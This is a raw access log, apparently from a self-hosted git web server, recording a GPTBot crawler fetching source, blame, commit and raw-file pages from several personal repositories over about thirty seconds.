[Length 10953] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/js/script.js" -[17/Feb/2026:15:09:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/js/script.js?display=source" [Client 74.7.227.38] [Length 15717] [Gzip 5.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/js/script.js" -[17/Feb/2026:15:09:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/js/script.js?display=rendered" [Client 74.7.227.38] [Length 10983] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/js/script.js" -[17/Feb/2026:15:09:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include" [Client 74.7.227.38] [Length 10709] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp" -[17/Feb/2026:15:09:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 18922] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build" -[17/Feb/2026:15:09:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 18922] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build" -[17/Feb/2026:15:09:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp/include" [Client 74.7.227.38] [Length 10198] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp" -[17/Feb/2026:15:09:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include" [Client 74.7.227.38] [Length 10712] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp" -[17/Feb/2026:15:09:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/python3.12" [Client 74.7.227.38] [Length 7] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/python3.12" -[17/Feb/2026:15:09:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/python3.12" [Client 74.7.227.38] [Length 7] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/python3.12" -[17/Feb/2026:15:09:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 18911] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build" -[17/Feb/2026:15:09:53 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" -[17/Feb/2026:15:09:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" -[17/Feb/2026:15:09:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/controller-next-todo.md" [Client 74.7.227.38] [Length 11755] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project" -[17/Feb/2026:15:09:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/controller-next-todo.md" [Client 74.7.227.38] [Length 11755] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project" -[17/Feb/2026:15:09:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include" [Client 74.7.227.38] [Length 10410] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:09:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 25013] [Gzip 12.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeCache.txt" -[17/Feb/2026:15:09:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 25010] [Gzip 12.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeCache.txt" -[17/Feb/2026:15:09:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 10206] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeCache.txt" -[17/Feb/2026:15:09:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/log_macros.hpp" [Client 74.7.227.38] [Length 11599] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:09:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include" [Client 74.7.227.38] [Length 10411] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:09:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 10206] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeCache.txt" -[17/Feb/2026:15:09:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 20677] [Gzip 14.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeCache.txt" -[17/Feb/2026:15:09:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 9942] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeCache.txt" -[17/Feb/2026:15:10:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp/include" [Client 74.7.227.38] [Length 9933] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:10:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/controller-next-todo.md?display=source" [Client 74.7.227.38] [Length 13228] [Gzip 4.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/controller-next-todo.md" -[17/Feb/2026:15:10:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/controller-next-todo.md" [Client 74.7.227.38] [Length 9956] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/controller-next-todo.md" -[17/Feb/2026:15:10:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/controller-next-todo.md" [Client 74.7.227.38] [Length 9957] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/controller-next-todo.md" -[17/Feb/2026:15:10:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 12745] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeCache.txt" -[17/Feb/2026:15:10:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 12745] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeCache.txt" -[17/Feb/2026:15:10:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 12745] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeCache.txt" -[17/Feb/2026:15:10:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/controller-next-todo.md" [Client 74.7.227.38] [Length 1924] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/controller-next-todo.md" -[17/Feb/2026:15:10:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/controller-next-todo.md" [Client 74.7.227.38] [Length 1924] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/controller-next-todo.md" -[17/Feb/2026:15:10:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/controller-next-todo.md" [Client 74.7.227.38] [Length 12894] [Gzip 6.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/controller-next-todo.md" -[17/Feb/2026:15:10:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/controller-next-todo.md" [Client 74.7.227.38] [Length 11725] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project" -[17/Feb/2026:15:10:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/appsettings.json?display=source" [Client 74.7.227.38] [Length 11262] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/appsettings.json" -[17/Feb/2026:15:10:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/appsettings.json?display=rendered" [Client 74.7.227.38] [Length 10943] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/appsettings.json" -[17/Feb/2026:15:10:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2finit_db.py" [Client 74.7.227.38] [Length 29677] [Gzip 5.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/init_db.py" -[17/Feb/2026:15:10:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2fimport_csv.py" [Client 74.7.227.38] [Length 27419] [Gzip 4.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/import_csv.py" -[17/Feb/2026:15:10:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/main" [Client 74.7.227.38] [Length 49522] [Gzip 26.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/main" -[17/Feb/2026:15:10:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/main" [Client 74.7.227.38] [Length 49519] [Gzip 26.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/main" -[17/Feb/2026:15:10:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/main" [Client 74.7.227.38] [Length 49522] [Gzip 26.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/main" -[17/Feb/2026:15:10:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/main" [Client 74.7.227.38] [Length 9914] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/main" -[17/Feb/2026:15:10:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/main" [Client 74.7.227.38] [Length 9916] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/main" -[17/Feb/2026:15:10:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/main" [Client 74.7.227.38] [Length 9915] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/main" -[17/Feb/2026:15:10:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/controller-next-todo.md" [Client 74.7.227.38] [Length 9928] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/controller-next-todo.md" -[17/Feb/2026:15:10:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/controller-next-todo.md" [Client 74.7.227.38] [Length 1924] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/controller-next-todo.md" -[17/Feb/2026:15:10:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.dgspec.json" [Client 74.7.227.38] [Length 12949] [Gzip 4.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj" -[17/Feb/2026:15:10:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?show-outdated=&style=split&whitespace=show-all" [Client 74.7.227.38] [Length 120351] [Gzip 14.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e" -[17/Feb/2026:15:10:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a?show-outdated=&style=split&whitespace=show-all" [Client 74.7.227.38] [Length 212854] [Gzip 13.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a" -[17/Feb/2026:15:10:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/database.sqlite?display=rendered" [Client 74.7.227.38] [Length 10878] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/database.sqlite" -[17/Feb/2026:15:10:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/Nuget%EC%97%90%20OPC%20UA%20%EB%9D%BC%EC%9D%B4%EB%B8%8C%EB%9F%AC%EB%A6%AC%EC%84%A4%EC%B9%98.md" [Client 74.7.227.38] [Length 10107] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/Nuget%EC%97%90%20OPC%20UA%20%EB%9D%BC%EC%9D%B4%EB%B8%8C%EB%9F%AC%EB%A6%AC%EC%84%A4%EC%B9%98.md" -[17/Feb/2026:15:10:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr 